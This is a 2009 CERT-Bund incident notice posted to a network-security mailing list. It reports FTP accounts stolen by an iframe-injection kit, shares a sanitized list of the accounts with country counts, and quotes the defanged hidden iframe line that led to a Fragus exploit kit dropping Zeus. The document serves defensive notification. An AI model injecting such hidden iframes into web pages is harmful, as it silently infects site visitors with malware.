[nsp-sec] More compromised ftp accounts
Thomas Hungenberg
th.lab at hungenberg.net
Fri Sep 4 08:01:34 EDT 2009
Hi teams,
Roman from abuse.ch came across a new Ziframer installation (see <http://www.abuse.ch/?p=1739>).
It comes along with a list of 18245 ftp credentials.
Many of the accounts were already included with the list of accounts I posted here on 2009-08-25
(found along with another Iframer kit).
Please find attached a sanitized list (pw removed) of 8169 compromised ftp accounts that are new.
Format: ASN | IP | CC | ftp username | AS name
Top 10 country codes:
2699 US
705 DE
592 RU
482 TR
424 FR
331 PL
329 CZ
310 HU
298 NL
222 EU
The Iframer was configured to inject this line (remove 'XXX'):
<ifrXXXame src="htXXXtp://seca.ws/forum/show.php" width="1" height="1" style="display:none;"></ifrXXXame>
This URL leads to a Fragus exploit kit which currently drops a Zeus/Zbot trojan.
- Thomas
CERT-Bund Incident Response & Anti-Malware Team
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: ftp_asn_20090904.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090904/b73655eb/attachment-0001.txt>
More information about the nsp-security
mailing list